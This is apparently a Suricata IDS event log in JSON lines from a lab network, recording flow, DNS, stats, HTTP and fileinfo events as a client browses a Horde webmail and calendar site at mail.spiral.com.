{"timestamp":"2020-02-29T00:26:03.000231+0000","flow_id":574029615970907,"event_type":"flow","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":17,"bytes_toserver":4066,"bytes_toclient":14425,"start":"2020-02-29T00:24:57.178779+0000","end":"2020-02-29T00:25:02.400737+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000608+0000","flow_id":327567212657976,"event_type":"flow","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1796,"bytes_toclient":3211,"start":"2020-02-29T00:24:57.179512+0000","end":"2020-02-29T00:25:02.203210+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000787+0000","flow_id":105264000271271,"event_type":"flow","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":20,"bytes_toserver":3073,"bytes_toclient":17407,"start":"2020-02-29T00:24:56.197543+0000","end":"2020-02-29T00:25:02.207159+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000947+0000","flow_id":1255271558660282,"event_type":"flow","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":2418,"bytes_toclient":6796,"start":"2020-02-29T00:24:57.180410+0000","end":"2020-02-29T00:25:02.203347+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.001092+0000","flow_id":1124614358556355,"event_type":"flow","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":825,"bytes_toclient":3037,"start":"2020-02-29T00:24:57.188099+0000","end":"2020-02-29T00:25:02.196186+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:06.000214+0000","event_type":"stats","stats":{"uptime":15218,"capture":{"kernel_packets":141634,"kernel_drops":0},"decoder":{"pkts":141724,"bytes":97351162,"invalid":195,"ipv4":140135,"ipv6":10,"ethernet":141724,"raw":0,"null":0,"sll":0,"tcp":134557,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10005,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":0,"flows_removed":5,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:13.000168+0000","event_type":"stats","stats":{"uptime":15225,"capture":{"kernel_packets":141728,"kernel_drops":0},"decoder":{"pkts":141732,"bytes":97351680,"invalid":195,"ipv4":140141,"ipv6":10,"ethernet":141732,"raw":0,"null":0,"sll":0,"tcp":134563,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:13.000748+0000","flow_id":291270444040479,"event_type":"flow","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":46,"pkts_toclient":48,"bytes_toserver":11808,"bytes_toclient":42234,"start":"2020-02-29T00:24:57.180511+0000","end":"2020-02-29T00:25:12.186174+0000","age":15,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:13.000894+0000","flow_id":1751078273571388,"event_type":"flow","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:12.088636+0000","end":"2020-02-29T00:21:12.197781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:13.001057+0000","flow_id":503484763396705,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:21:12.449121+0000","end":"2020-02-29T00:21:12.451002+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:14.850575+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14644,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:15.000259+0000","flow_id":1436373150435366,"event_type":"flow","src_ip":"192.168.10.130","src_port":34294,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3992,"bytes_toclient":16373,"start":"2020-02-29T00:25:09.690214+0000","end":"2020-02-29T00:25:14.727805+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:15.158192+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} {"timestamp":"2020-02-29T00:26:16.000361+0000","flow_id":1992601480049501,"event_type":"flow","src_ip":"192.168.10.130","src_port":34298,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":2028,"bytes_toclient":3463,"start":"2020-02-29T00:25:09.701277+0000","end":"2020-02-29T00:25:14.750566+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001230+0000","flow_id":235487409740482,"event_type":"flow","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6225,"start":"2020-02-29T00:25:12.465602+0000","end":"2020-02-29T00:25:17.888501+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001636+0000","flow_id":1098183115353279,"event_type":"flow","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:17.208063+0000","end":"2020-02-29T00:21:17.319419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:19.656142+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:26:19.667468+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44728,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32226,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:19.913180+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491}} {"timestamp":"2020-02-29T00:26:19.955751+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:26:19.958220+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:26:19.961103+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:26:19.966016+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} {"timestamp":"2020-02-29T00:26:19.968061+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:26:19.969853+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":3}} {"timestamp":"2020-02-29T00:26:19.971829+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:26:19.973668+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":4}} {"timestamp":"2020-02-29T00:26:19.974070+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:26:19.976662+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":5}} {"timestamp":"2020-02-29T00:26:19.978233+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:26:19.987537+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":6}} {"timestamp":"2020-02-29T00:26:19.998674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.000847+0000","event_type":"stats","stats":{"uptime":15232,"capture":{"kernel_packets":141740,"kernel_drops":0},"decoder":{"pkts":141750,"bytes":97361929,"invalid":195,"ipv4":140159,"ipv6":10,"ethernet":141750,"raw":0,"null":0,"sll":0,"tcp":134579,"udp":5370,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2910,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2926,"synack":2917,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1917,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2456,"failed_udp":116},"tx":{"http":4976,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2540}},"flow_mgr":{"closed_pruned":2888,"new_pruned":17,"est_pruned":2544,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":4,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":86812,"memcap":0}}} {"timestamp":"2020-02-29T00:26:20.001315+0000","flow_id":1303568466127980,"event_type":"flow","src_ip":"192.168.10.130","src_port":34286,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":35,"pkts_toclient":61,"bytes_toserver":3699,"bytes_toclient":80638,"start":"2020-02-29T00:25:01.732268+0000","end":"2020-02-29T00:25:06.784171+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001608+0000","flow_id":331982439825668,"event_type":"flow","src_ip":"192.168.10.130","src_port":34300,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1292,"bytes_toclient":719,"start":"2020-02-29T00:25:09.704772+0000","end":"2020-02-29T00:25:15.702759+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001680+0000","flow_id":922484608450970,"event_type":"flow","src_ip":"192.168.10.130","src_port":34302,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2110,"bytes_toclient":1988,"start":"2020-02-29T00:25:09.704922+0000","end":"2020-02-29T00:25:16.392611+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001745+0000","flow_id":1539237617182180,"event_type":"flow","src_ip":"192.168.10.130","src_port":34296,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":3711,"start":"2020-02-29T00:25:09.697828+0000","end":"2020-02-29T00:25:14.727346+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.000326+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.000682+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} 